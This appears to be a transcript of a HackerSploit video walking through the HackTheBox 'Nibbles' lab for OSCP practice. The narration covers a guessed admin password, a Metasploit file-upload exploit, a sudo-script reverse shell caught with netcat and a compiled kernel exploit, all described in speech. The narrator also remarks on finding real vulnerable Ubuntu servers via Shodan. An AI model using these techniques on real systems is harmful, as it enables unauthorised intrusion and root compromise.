HackTheBox Nibbles - Exploiting Arbitrary File Upload

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

[Music] hey guys hackersploit here back again with another video welcome back to the oscp prep series in this video we're going to be taking a look at nibbles on hacked box so this is one of these boxes that are you know actually quite uh fun and useful um in regards to preparing for your oscp certification so it's a linux box and i'm going to be exploring the process of you know gaining initial access and of course performing privilege escalation the objective being to obtain root access so you can essentially obtain all the flags uh that being said it's a fairly simple box but i think it has a quite a few interesting techniques that i wanted to highlight and i'll be showing you how to use various tools and scripts to perform enumeration right so before i actually get started with that i just want to update you on the current situation regarding uh the video releases and the schedule that i've actually worked on so you can expect to have at least three videos uh per week so of course they'll range from you know from various topics from you know penetration testing red teaming uh web applica web application penetration testing we're working a lot of bug bounty content and red team content so you can expect a lot of that in the coming months and we finally have everything ready to go we've worked on a lot of series in the background that we're going to be releasing so really excited for that that being said let's get started so the first thing we want to do is of course take a look at the nmap scan which i've already performed ahead of time and again the results will be fairly simple you can take a look at my nmap scan options here essentially perform the synth scan and use the advanced option here the timing template was t4 and i scanned all tcp ports right and essentially output it there the ip is going to be different because i performed this scan previously as for the services that are running on the target you can see it's fairly simple so you have ssh running open ssh 7.2 p2 on the default port which is 22 we also have a web server running on port 80. so that's running apache httpd 2.4.18 so if we access the web server here you can see it simply tells us hello world if we view the the source of the page you can see there's nothing however at the end here we can see a an html comment saying uh nibble blog directory nothing interesting here all right so you know based given the fact that this is a ctf style we can essentially access it so we'll say nibble blog we hit enter and it takes us directly to what looks uh or what appears to be a content management system called nibble blog as you can see right over here the bottom part by nibble blog so i'm just going to perform some directory brute forcing in this video let's try and use the buster so i can actually show you various options associated with this tool because i've been using go buster quite a bit and i want i don't want to depend on a single tool um so i'll set it to 100 threads for the word list that we're going to be using let's try and use user share word lists and i will use the buster and we'll use directory list lowercase 2.3 medium.txt you can use whatever is comfortable for you now for the brute forcing options we want it to be recursive so we want to brute force subdirectories as well we don't perform any fuzzing at the moment because we don't know what we're dealing with per se we know it's running apache that's as far as we know we also know it's running nibble blog which we'll actually perform research on in a second uh but we'll also enable brute force directories and brute force files so that we are we can actually brute force um you know different files there now as as per the brute force files options we can specify extensions so when we're dealing with a content management system we can specify other extensions so for example php html xml txt and again based on the web server stack that's running on the target you can then modify the extension so for example if i was run if the target was running a microsoft web server iis web server then of course you can change it to asp and other types of uh extensions associated with the web server technology involved in this case we pretty much can tell that it's running uh you know apache and of course uh php you know consequently php so we can just hit start now and we're going to wait for this to enumerate all the results in the meantime we can perform some vulnerability analysis on the content management system and we'll do that using search exploit so i'll just zoom up zoom in here and we'll say search exploit and we'll just search for nibble right and we can see we have two vulnerabilities for nibble blog so it looks like a content management system so um this one right over here let me just drag this to the side for a second and let me just run that one more time we can see uh for nibble block version three we have multiple sql injection vulnerabilities and it will block 4.0.3 that's essentially an arbitrary file upload module for metasploit we'll get to these in a second however if we take a look at the directory brute forcing here you can see we have the admin.php page so let's try and access that now so i'm going to say admin dot php and that essentially allows us to log into the content management system let's take a look at a few other directories there what i'll do is let me just duplicate this tab here and let's see what else we're able to identify we get the feed we also get nibble blog content private so that's a directory under content and private right so if we access that directory it looks like we have directory listing enabled and we get uh xml files here so we have various configurations so we have the config.xml file which essentially gives us the email here that i think we can utilize so let me just copy this down here and right so let me copy that here i'm just going to open up mousepad and i'll paste that in there let's take a look at the other files we also have keys.php which doesn't display anything obviously we also have plugins posts shadow.php tags and users all right so we have users.xml um so we can see we have a username admin here so we can try and log in with that but we don't have a password because we essentially have this appears to be just a configuration file that contains the username the ip the date and the fail count right or you know essentially the parameters associated with the login options for that particular user so i'll just paste that in there so we have the um we have the username and we have the the email right so we can actually try and log in with this so i'm just going to say admin and we don't have a password but we can try and guess so the name of this box is nibbles so i'll try nibbles and i'll hit log in there and it looks like that worked so again we have access to the content management system and we can take a look at the settings here as per you know whether or not we can use this for initial access but if you remember correctly we have a meta split module that allows us to perform arbitrary file uploads however we need to verify that it's running version 4.0.3 let's see if we can actually identify the version here let's head over to the dashboard we can't see any version enumeration here so again if we head over into plugins let's see what plugins we have here so these are simple plugins that essentially extend functionality here for this content management system similar to um similar to very very similar to wordpress uh right but we still aren't able to identify the version actually we do there we are so nibble blog 4.0.3 so we know that that works so let's actually try and load up this module so i'm just going to say msf console msf console and we'll then search for nibble or enable blog as it were let's see whether we can find that particular module so i'm going to say search and we'll say nibble nibble blog and we have it right over the arbitrary file upload so we'll copy that and we'll say use paste that in there let me just reduce the font size here so that we have a better spacing and organization so the default payload is php interpreter reverse tcp that's perfectly fine if we show the options for this module we can see that we need to provide the password for the admin panel as well as the username we already have that we're able to guess that the r port the r hosts um as well as the target uri which is nibble blog um so we can start setting those options the first thing i want to do however is just get my um my ip address this is going to be my uh the ip address of the tunnel interface which is the hack the box vpn ip uh because this is being performed on a you know we're actually interacting with the target via vpn so we're going to say set lhost and i'll paste the ip there we'll leave the l port as it is that's perfectly fine the password we know was nibbles sorry and we then had the uh the our hosts option which will uh we will just set here so i'm just gonna copy the ip so uh we'll just head over there and let's copy the ip and paste that in there the r port option is fine we want to set the target uri [Applause] target uri is going to be nibble blog yep that's correct and then the username is going to be admin right in lower case as well all right so if we show the options now everything looks like it's set correctly and we can just hit run let's see whether we get a metabolic session on the target system so there we are it looks like it's sending the stage and it deletes the image that contains the payload or the stage rather and we get a meterpreter session so i'm just going to give that a few seconds to open up here and again let me just reduce the font size here right so let's see whether we're able to get it there we are we get an interpreter session so this info we can see it's a linux box obviously and it looks like it's running ubuntu and we're currently the name of the computer is nibbles get use id we're currently the user nibbler all right so i'm going to open up a shell session here and i'll just spawn a bash session so bin bash i so we don't have any job control that's fine let me head over to the home directory list out the contents here looks like we have a the user flag which uh again i've already completed this box in the past so again i'll just cut it out uh one time here so there we are we get the user flag we also have a personal.zip file here or zip archive and that's pretty much it so let's perform some some system information right um so the first thing i'm going to do is let's get out the kernel information so the kernel is 4.4.0 104 generic if we cut out the distribution information here so cat etsy release we can see it's running ubuntu 16.04.3 lts and uh you know we can pretty much our objective now will be to again obtain root access so you can see permission denied let's try and enumerate the users on the system um so cat etsy password we can see we have the nibbler user and that's pretty much it in regards to user accounts that the rest are going to be service or the rest old service accounts for ssh mysql etc um right and yeah we pretty much don't have any other user apart from the root user which will try and utilize so we can start performing enumeration uh in regards to identifying vulnerabilities uh you know by leveraging various uh automation scripts or automated enumeration scripts like lin p's or linum or the linux exploit suggester um so what we're going to do is let's head over into the temp directory here and i will use the made over to my desktop and linux enum and i'll let's use the len enum script here so i'm just going to again say sudo python m simple http server and we'll host that on port 80 so that we can transfer the script over to the target paste in my password there and by the way i also want to i need my ip address here because we'll need to actually transfer it with uh with wget so again there's my vpn ip there um so i'll say wget http and it will transfer it so my ip is 10 10 14.139 and with the script we want to download this lean lin enum.sh and by the way you can actually you can actually get more information regarding this script uh let me just open this up so lynn enum let me open that up in google and this is the script here but if you are interested this is going to be in the description section so it's a an enumeration script for linux so again it essentially allows you to perform privilege escalation checks on the target system so i'm just going to download the script there we are and again i'm going to give it executable permissions um so lynn enum dot sh right and we can now execute it so lininum.sh and this will give us an overview of uh all the relevant information pertinent to elevating our privileges on the target system um right so let's head over to the top here because it displays the kernel information and the distribution release information as well as the current user other users that have logged onto the system which is very useful in some cases who else is logged on using overt authentication protocols like ssh remember we have access on the target through a a payload right so we are not actually authenticated to the target um we can probably try and utilize the um the credentials we retrieved and log in via ssh but in this case we don't need to do that uh if we take a look at all the other information here we can see that uh under the option here it says we can sudo without supplying a password so again we're able to identify our scripts or binaries that we can execute without providing a password as the root user right so i've already explained this vulnerability before and in this case it looks like we can execute the script called monitor.sh under the home directory and it's called again this is under the nibbler user which we have access to so we can actually do this i'm not sure whether this script exists because the personal file that we found was a zip archive so we probably can unzip it or create our own and then we can create our own monitor.sh script and then execute it and that will perform whatever we want it to do and of course it's going to perform or run the script with root privileges you can see right over here possible pseudo pawnage and it provides us with the directory or the actual script that we can execute without providing a password right and uh yeah we don't have any other we weren't able to detect any other vulnerabilities if we take a look at the cron tab uh we don't have any cron jobs there as well as the system d timers uh and uh yeah for the processes again we pretty much have the standard processes associated with a lamp stack all right so we can try and exploit that before i do that however let me just copy the actual directory and name of the script here and i'll just paste it in mousepad just so we can have it as a reference and there we are looks like the scan is completed so if we head over to our home directory for the user nibbler you can see we have the personal.zip archive here so if we unzip it we can see personal dot zip um right so it actually creates the scripts for us so it you know essentially unzips that particular directory so personal i'm sorry cd personal and stuff [Applause] and cat monitor dot sh so it looks like it already does stuff um what we can do ideally is modify this and make it execute a um a you know our own malicious commands or arbitrary commands that can provide us with a reverse shell with root privileges so i'm just going to remove this script here because again i don't want to do all right i'm not going to be using the functionality within it so what i'll do on my kali vm here is let me just exit and i'll just head back into documents hack the box boxes and nibbles and within this we'll create the script here and then we'll transfer it over to the target so monitor.sh and again because this is a bash script we're going to say bin bash and then i'm going to search for the bash reverse shell and we'll utilize tcp so again payloads all the things this is a great reference and we'll go to bash tcp and we'll use the first option here right and again we'll just add that so i'll head back over into my terminal paste that in there we now need to get our ip address right so again let me just make sure i have that copied it's uh there we are so 10 10 14 139 so 10 10 14 1 39 and the port that we want to connect back to or we want this script to connect back to is one two three four and that should work i'm just going to provide it with executable permissions uh sorry chmod plus x monitor dot sh and we can now transfer it so i'm just gonna close this and we can then serve this particular directory by the way the the terminal alias right over here called serve is just my own alias that i created that essentially uh you know again we'll start up the simple http server module and will host uh or you know will actually host the files within this particular directory right so there we are and we can now transfer it over to the target in this particular directory and we'll just say wget http 1010 14 139 monitor dot sh we get the script here again i'm just going to make sure it has executable permissions monitor dot sh and now we can set up our listener so i'm just going to terminate that there and we'll say netcat nvlp1234 and then we can now execute the script so the way we need to execute it when we're talking about scripts or binaries with the no password flag set we need to execute it with the absolute path so we say uh home nibbler personal stuff monitor dot sh and we hit enter and we get a connection back on our listener here and you can see we have root access so we can head over into the root directory and there we are we have the roof flag so catroot.ext and we get the root flag there all right so we've been able to elevate our privileges successfully uh however we can also explore other privilege escalation vectors so for example we could try and identify whether this particular target is vulnerable to a kernel exploit and again what i'll do is i'll terminate my privileged session yeah there we are we're back onto cali and on the target i'm just going to head back over into the temp directory so tmp and we are going to copy over the linux exploit suggester script however before we do that let's try and identify whether we can find any vulnerabilities with search exploit or an exploit db so let me just get out the kernel version because we are targeting the kernel so it's 4.4.0 so search exploit um 4.4 actually let me say linux 4.4.0 and 104. right we hit enter let's see whether we can find any kernel exploits you know with search exploit um so right over here we can see we have 4.4.0116 that's the closest match right and we can try it out um again let me just uh expand this here so we can actually see what this particular exploit does i'm just going to search for it there we can also try and search for this particular exploit on the web but if we have the code available here we can try and use it right so 4.4.0 this is local privilege escalation and this the uh the actual script is provided there so we can actually try and utilize it it should work if the variant is or the the kernel version is the same regardless of the variant and the version of ubuntu is the same although in our case the version of ubuntu that's running on the target is 16.04.3 but we can still try let's uh let's see whether it'll actually work so i'm just going to copy this exploit code and we'll say copy user share exploit db exploits paste in the the actual directory there and i'll copy to my current directory so we have the script there the c code sorry or the c file so let's try and see let's open it up and let's see how this works right so it's been tested on that version of ubuntu and again what we can do it looks like you know again it has a payload there and again we can't really deduce what it's doing just by looking at the script because there isn't any documentation provided along with it um so what i'll do is i'll just search so i'll use the web search plugin my this is a zsh plugin so we can search linux 4.4.0 and of course we'll try we can try and utilize the same version here so again that's going to be 104 exploit let's see whether that provides us with anything there we are we have the exploit db code there and it's pretty much just going to give us what we already have right but no instructions as to how we can execute it right um so um let's see this is the double uh well actually this version is not for our particular for a particular version of ubuntu uh but right over here again these ones are not the same ones here for the version the kernel version running on on our target and yeah we i don't think we can actually get quite a bit of information regarding this particular exploit although it looks like we have a vulnerability report here but it still doesn't give us an idea of what's going on right as how to use this but we can try and improvise around it now as i've said before you never want to run kernel exploits on a target that you haven't tested before right so ideally if you're working in a real environment you know running a kernel exploit can cause a kernel panic or you know can actually cause the system to crash and this applies for both windows and linux systems so again you have to be very careful with this and ideally i don't really want to do this but we can try compiling it with gcc just to see whether we can actually compile it uh simply without providing any compilation options uh looks like it compiles successfully so again i'm just going to provide it with executable permissions exploit and then we can again serve the files within this directory and transfer it over to the target so i'll do that right now 10 10 14 139 and it's just called exploit and we're able to get it successfully if we run it uh right so chmod plus x exploit there we are and then we run exploit here it looks like it's run we type in id we have root access and if i now say let's get a bash session here and we've got root access via kernel exploit so again uh this i don't think this is a um this was actually one of the uh the privilege escalation vectors that you could use or that you can use although as i've just demonstrated there's multiple ways of gaining access or you know elevating and privileges on a target system and you know this is fairly applicable because they are still ubuntu servers running ubuntu 16.04 servers running on the internet and you can you can actually test this by searching on showdown for ubuntu 16.04 servers probably versions of ubuntu that meet the parameters to run this particular exploit and you know you can actually elevate your privileges using this particular technique uh and of course the reason why i showed you this is because uh again uh when you're dealing with ctf boxes and you have uh you know ctf based privilege escalation vectors like the no password options configured for a particular script or binary that is something that you'll find in some cases but in most cases if the linux server is has been set up by a an experienced system administrator you'll never find that that particular script is in a directory that any other user apart from the root user can can actually access so again you should actually uh what i'm trying to you know pass along here is you should be comfortable exploring various privilege escalation vectors on linux and i'll be exploring additional ones in the future like suid binaries and a few others that target cron jobs so on and so forth so that's pretty much it for this video it's a very interesting box as i said it relies heavily on enumeration especially to gain your initial foothold on the target system uh but whenever you're dealing with a content management system it's going to be fairly simple if they're you know if a vulnerability exists for that content management system uh that being said that's gonna be for this video uh let me know what you guys think in the comments if you have any questions or suggestions leave them in the comments section you can also contact me uh on twitter if you like this video found value in it please leave a like down below and i'll be seeing you in the next video a huge thank you to all of our patreons your support is greatly appreciated and this is a formal thank you so thank you shamir douglas ryan carr sandor michael busby sits up doozy defean barry dustin empress and michael hubbard your support is greatly appreciated and you keep us making even more high quality content for you guys so thank you [Music]

Info

Channel: HackerSploit

Views: 12,532

Rating: undefined out of 5

Keywords: hackersploit, hacker exploit, hacking, kali linux, linux, linux privilege escalation, linux privilege escalation tryhackme, linux privilege escalation tutorial, gtfobins, gtfobins knife, gtfobins privilege escalation, gtfobins tutorial, hackthebox, hackthebox knife, hackthebox knife writeup, hack the box, hacktehbox, hackthebox invite, hackthebox walkthrough, pwnbox, hackthebox pwnbox, hackthebox buff, hackthebox traceback, hackthebox remote, hackthebox nibbles, htb nibbles

Id: ZAl2Q27oVtc

Channel Id: undefined

Length: 28min 10sec (1690 seconds)

Published: Mon Sep 20 2021